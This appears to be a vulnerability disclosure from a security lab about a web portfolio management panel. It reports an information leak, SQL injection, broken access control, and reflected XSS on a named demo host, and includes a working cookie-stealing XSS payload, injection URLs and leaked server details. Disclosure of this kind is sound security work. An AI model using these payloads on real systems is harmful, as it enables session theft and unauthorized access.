Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
52 lines (25 sloc) 1.92 KB

###Techno Portfolio Management Panel - SQL Injection/XSS/Information leak/Broken Access Control

ADLab of Venustech

Well, when I pentest the official demo site of Techno Portfolio Management Panel.

I found when I login into the backend, it left some vulnerabilities here.

Information leak:

URL: http://dacy.esy.es/eng/panel/search.php?s=1'

For example, we can get some sensitive data here like the absolute path:

/home/u633631124/public_html/eng/panel/search.php

image

xss:

URL: http://dacy.esy.es/eng/panel/search.php?s=123%27%22%3E%3Csvg/onload=alert(document.cookie)%3E%3C%27%22

For example, We can get the site cookie here or do something more evilly.

image

SQL Injection:

image

URL: http://dacy.esy.es/eng/panel/search.php?s=1

For example, We can get database user or other info here , using some tools or just by hand:

current user: 'u633631124_dacy@10.2.1.20'

Broken Access Control

While the feedback option should only be viewed or operated only by the admin user itself , I used the cookie of the demo normal user to replace the cookie of admin, and I removed a feedback successfully by the authority of normal user at last .

Feedback Remove URL: http://dacy.esy.es/eng/panel/portfolio.php?action=delete&id=x

image image

At a word, it's a vulnerability of broken access control.